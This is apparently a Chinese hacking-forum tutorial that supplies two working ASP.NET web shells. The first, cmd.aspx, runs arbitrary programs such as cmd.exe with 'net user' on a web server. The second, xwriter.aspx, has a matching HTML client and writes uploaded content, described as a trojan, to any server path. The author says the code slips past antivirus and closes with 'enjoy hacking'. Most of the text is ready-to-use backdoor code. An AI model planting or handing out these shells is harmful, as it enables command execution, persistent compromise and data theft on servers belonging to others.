菜鳥學堂:
一、cmd.aspx
在邪惡八進制論壇(ps:有誰知道為什么最近幾天這論壇打不開?���。┯信笥烟岢鰓ebadmin執行命令不能帶參數的問題�����,偶找了個bt主機來試試�����,果然有問題���,就把以前那個cmd.aspx改了改,就請湊合著用先��。webadmin 2.x的下個版本將修復這個問題.
把一下代碼復制保存為一.aspx文件即可:
<%@ page language="vb" debug="true" %><%@ import namespace="system.io" %><%@ import namespace="system.diagnostics" %><script runat="server">
sub runcmd(src as object, e as eventargs)
dim myprocess as new process()
dim myprocessstartinfo as new processstartinfo(xpath.text) myprocessstartinfo.useshellexecute = false myprocessstartinfo.redirectstandardoutput = true
myprocess.startinfo = myprocessstartinfo
myprocessstartinfo.arguments=xcmd.text
myprocess.start()
dim mystreamreader as streamreader = myprocess.standardoutput
dim mystring as string = mystreamreader.readtoend()
myprocess.close()
mystring=replace(mystring,"<","<")
mystring=replace(mystring,">",">")
result.text= vbcrlf & "<pre>" & mystring & "</pre>"
end sub
</script>
<html>
<head>
<title>asp.net shell for webadmin2.x final</title>
<meta http-equiv="content-type" content="text/html; charset=gb2312" />
</head>
<body>
<form runat="server">
<asp:label id="l_p" runat="server" width="80px">program</asp:label>
<asp:textbox id="xpath" runat="server" width="300px">c:/windows/system32/cmd.exe</asp:textbox>
<br />
<asp:label id="l_a" runat="server" width="80px">arguments</asp:label>
<asp:textbox id="xcmd" runat="server" width="300px" text="/c net user">/c net user</asp:textbox>
<br />
<asp:button id="button" runat="server" width="100px" text="run"></asp:button>
<p>
<asp:label id="result" runat="server"></asp:label>
</p>
</form>
</body>
</html>
二、xwriter.aspx
記得有個asp下的小馬就是利用fso把提交的文本信息保存為一個文件�����,雖然體積比eval大些但是代碼完全合法�����,殺毒軟件也不會找茬的����。呵呵,以下代碼就是在asp.net實現這功能(自己拿去改改還可以插入aspx文件哦):
<%@ page language="vb" %>
<%@ import namespace="system.io" %>
<script runat="server">
sub page_load(sender as object, e as eventargs)
dim mywrite as new streamwriter(request.form("path"), true, encoding.default) mywrite.write(request.form("content"))
mywrite.close
response.write("done!")end sub
</script>
以下是客戶端�,復制下來保存為htm文件:
<!doctype html public "-//w3c//dtd html 4.01 transitional//en""http://www.w3.org/tr/html4/loose.dtd">
<html>
<head>
<meta http-equiv="content-type" content="text/html; charset=gb2312">
<title>xwriter.net by lake2</title>
</head>
<body>
<form name="form1" method="post" onsubmit="twosubmit(this);">
<div align="center">url:
<input name="url" type="text" value="http://www.xxx.com/a.aspx" size="60">
<br>
path:
<input name="path" type="text" id="path" value="e:/myweb/myown/a.txt" size="60">
<br>
<textarea name=content cols=120 rows=10 id="content" width=45>填入生成木馬的內容,最好是全英文</textarea>
<br>
<center>
<br>
<input type=submit value=提交>
<br>
enjoy hacking !!!!!! </div>
</body></html>
<script language="javascript">
function twosubmit(form1){
var url = document.form1.url.value;
form1.action=url;
form1.submit();
}
</script>
